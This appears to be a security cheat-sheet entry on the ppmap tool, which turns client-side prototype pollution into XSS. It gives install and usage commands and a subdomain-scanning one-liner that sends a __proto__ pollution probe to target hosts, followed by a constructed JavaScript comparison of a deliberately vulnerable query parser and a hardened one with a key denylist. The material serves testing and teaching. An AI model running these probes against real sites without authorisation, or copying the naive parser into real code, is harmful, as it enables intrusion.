Prototype Pollution to XSS

ppmap is a scanner/exploitation tool written in Go that leverages client-side prototype pollution to reach XSS by exploiting known gadgets.

sudo git clone https://github.com/kleiton0x00/ppmap.git
cd ppmap
sudo chmod 777 setup.sh
sudo bash setup.sh

cat hosts.txt | cariddi | ppmap

echo https://target.com | ppmap
#one-liner
subfinder -d target.com -all -silent | httpx -silent -threads 300 | anew -q alive.txt && sed 's/$/\/?__proto__[testparam]=exploit\//' alive.txt | page-fetch -j 'window.testparam == "exploit"? "[VULNERABLE]" : "[NOT VULNERABLE]"' | sed "s/(//g" | sed "s/)//g" | sed "s/JS //g" | grep "VULNERABLE"
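
Why the `__proto__[testparam]=exploit` probe in the one-liner shows up as `window.testparam`, as an added example that is not part of the original page or of ppmap: a constructed naive query-string parser next to a hardened one. The function names are hypothetical, and it runs in Node.js, where a fresh object stands in for `window`.

```javascript
// Constructed example: not from the page or from ppmap. Names are hypothetical.
const FORBIDDEN = new Set(['__proto__', 'constructor', 'prototype']);
// Split "a[b][c]" into ["a", "b", "c"].
const keyPath = (rawKey) => rawKey.split(/[\[\]]+/).filter(Boolean);

// VULNERABLE: plain property access lets the segment "__proto__" resolve to
// Object.prototype, so the final write lands on the shared prototype.
function parseQueryNaive(query) {
  const out = {};
  for (const [rawKey, value] of new URLSearchParams(query)) {
    const path = keyPath(rawKey);
    if (path.length === 0) continue;
    let node = out;
    for (const part of path.slice(0, -1)) {
      if (typeof node[part] !== 'object' || node[part] === null) node[part] = {};
      node = node[part];
    }
    node[path[path.length - 1]] = value;
  }
  return out;
}

// HARDENED: null-prototype containers plus a key denylist, so no path
// segment can reach Object.prototype.
function parseQuerySafe(query) {
  const out = Object.create(null);
  for (const [rawKey, value] of new URLSearchParams(query)) {
    const path = keyPath(rawKey);
    if (path.length === 0 || path.some((p) => FORBIDDEN.has(p))) continue;
    let node = out;
    for (const part of path.slice(0, -1)) {
      if (typeof node[part] !== 'object' || node[part] === null) node[part] = Object.create(null);
      node = node[part];
    }
    node[path[path.length - 1]] = value;
  }
  return out;
}

// Same check the one-liner evaluates as window.testparam, on a fresh object.
function isPolluted(parser, query) {
  parser(query);
  const polluted = ({}).testparam === 'exploit';
  delete Object.prototype.testparam; // clean up so the next run starts fresh
  return polluted;
}

const PROBE = '__proto__[testparam]=exploit'; // probe string from the one-liner
for (const p of [parseQueryNaive, parseQuerySafe])
  console.log(p.name, isPolluted(p, PROBE) ? '[VULNERABLE]' : '[NOT VULNERABLE]');
```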
